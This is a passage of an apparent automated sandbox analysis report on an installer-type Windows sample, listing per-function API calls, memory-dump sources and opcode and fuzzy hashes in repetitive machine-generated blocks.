                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Enum$CloseValue
                                                                • String ID:
                                                                • API String ID: 397863658-0
                                                                • Opcode ID: bfb43a58064f35a202510d154baaddbf2c883fb0f83fa026dbde7361418dddc5
                                                                • Instruction ID: a8e4f27cd85b524b938bc80bb312ff0c07efa3365ef466736b2b8963d993c2c8
                                                                • Opcode Fuzzy Hash: bfb43a58064f35a202510d154baaddbf2c883fb0f83fa026dbde7361418dddc5
                                                                • Instruction Fuzzy Hash: 92017C71A11504BBEB149FA49E48AAFB77CEF40348F10403AF501B61C0D7B85E40866D
                                                                Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID:
                                                                • API String ID: 3356406503-0
                                                                • Opcode ID: dee3066ffd72378a80549679b72257bdff4fdc3bc5ced5e2bc25f81f6ea14ea6
                                                                • Instruction ID: af493c066ab36ea8406690c3d62a07c4fb2ed7115def6bf4d18b774961f6c260
                                                                • Opcode Fuzzy Hash: dee3066ffd72378a80549679b72257bdff4fdc3bc5ced5e2bc25f81f6ea14ea6
                                                                • Instruction Fuzzy Hash: CD116A71910209EBCF14DFA4CA589AEB774FF04354B20843BE402B62C0D3B88A44DB5E
                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                • Instruction ID: f4b073df4371d13d5e47470e1508f1e4354d1df05d26164fcbedf483487d3525
                                                                • Opcode Fuzzy Hash: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                • Instruction Fuzzy Hash: 4D01F4316242209FE7094B389D05B6A3698E710319F14823FF855F65F1EA78DC029B4C
                                                                Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseDeleteValue
                                                                • String ID:
                                                                • API String ID: 2831762973-0
                                                                • Opcode ID: 617476a9b03e2e3b578eb78f908950f70b0d6d950c3ab7fb2a5afb69e4064c5d
                                                                • Instruction ID: 85a5e790261a6a1b6dedd729f081e1fb82c2b0bf937f90b5091167455713ef2b
                                                                • Opcode Fuzzy Hash: 617476a9b03e2e3b578eb78f908950f70b0d6d950c3ab7fb2a5afb69e4064c5d
                                                                • Instruction Fuzzy Hash: 5AF06232A00120ABDB10AFA89A4DAAE73A5AF44314F16043FE651B71C1DAFC5D01563D
                                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$EnableShow
                                                                • String ID:
                                                                • API String ID: 1136574915-0
                                                                • Opcode ID: ba2a3c5e5c5e776cdf5630d67b2c53ff1ecd8db0fb1778bda333e84ab02891b0
                                                                • Instruction ID: 5d2b838fc97348560faaf82546316e7c29db3ee13ca796b15ebd5141c346d58e
                                                                • Opcode Fuzzy Hash: ba2a3c5e5c5e776cdf5630d67b2c53ff1ecd8db0fb1778bda333e84ab02891b0
                                                                • Instruction Fuzzy Hash: 6FE09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE401F20C1CBB85C008A2D
                                                                Function 00406806 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                  • Part of subcall function 00406796: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                  • Part of subcall function 00406796: wsprintfW.USER32 ref: 004067E8
                                                                  • Part of subcall function 00406796: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067FC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                • Instruction ID: c5f632ab0fd527bf8e68b4786b10832766149758e6d8e51d9ba55f9b7eb13659
                                                                • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                • Instruction Fuzzy Hash: 30E0863350421056E211AA746E44C7B77A89F99750307843EF956F2080D738DC359679
                                                                Function 00405F07 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                Function 00405EE2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,?,00405AE7,?,?,00000000,00405CBD,?,?,?,?), ref: 00405EE7
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EFB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                • Instruction ID: 11a24c4abb36edafbee48cc994cb64d758a4bce1ebd63d049f972be52462095a
                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                • Instruction Fuzzy Hash: C7D0C9725045316BC2102728AF0889BBB55EB643717054A35F9A5A22B0CB314C528A98
                                                                Function 004059C5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,004034B8,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 004059CB
                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059D9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                • Instruction ID: 1e5fcd6d8aa83e7c3539c134ce858d200345c8ad9b438ef6e258ac5dd368824a
                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                • Instruction Fuzzy Hash: 27C04C71204541EEE6505B20AE09B177A909B50751F26843A6147F01A0DA388455E93D
                                                                Function 6EDF2AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNELBASE(00000000), ref: 6EDF2BB7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 1fe9c35d73920ef907ce93ca0abc8605c69a2fca3a7c40378c0c1e61465cd1d7
                                                                • Instruction ID: 0c69139f12010d59fc2fcddded404d30a952411c5821f62896ef02f9542319cb
                                                                • Opcode Fuzzy Hash: 1fe9c35d73920ef907ce93ca0abc8605c69a2fca3a7c40378c0c1e61465cd1d7
                                                                • Instruction Fuzzy Hash: FA416171500684EFEB20DFE4E995B9A3778EF4631CF22C826E906C7114D735D9838BA1
                                                                Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileMove
                                                                • String ID:
                                                                • API String ID: 3562171763-0
                                                                • Opcode ID: b0fff4f7d9f0c8c4e53b92ad7996c7cf9495e9d5390423736948b2db19d58f54
                                                                • Instruction ID: fcc600a422b8a42da4105bc5b3b2554e42f689db638891b56f5b1ccf785cbf50
                                                                • Opcode Fuzzy Hash: b0fff4f7d9f0c8c4e53b92ad7996c7cf9495e9d5390423736948b2db19d58f54
                                                                • Instruction Fuzzy Hash: 0AF0B431608114A6CB10AFB68F0DD9F33609F52338F250A3FF421B21D1E6FC8941556E
                                                                Function 004023AA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringWrite
                                                                • String ID:
                                                                • API String ID: 390214022-0
                                                                • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                                                                • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                                                                Function 004062AC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 004062D5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                • Instruction ID: 3317d7e482e8079663a6db4a97809581e22c1b07b88153a27e00a08cc0e2c803
                                                                • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                • Instruction Fuzzy Hash: 52E0ECB2020109BEEF19AF90DD1ADBB371DEB04350F01492EF916E4091E6B5A930AA74
                                                                Function 00405F8A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F9E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                • Instruction ID: f93b0abb86e743badb4163669300e0f642a0e5fa5e5e92c65fa389833edf0ca2
                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                • Instruction Fuzzy Hash: D7E08C3220121AEBEF11AE618C04EEBBB6CFF01360F004832F910E6240D238E8218BA4
                                                                Function 00405FB9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
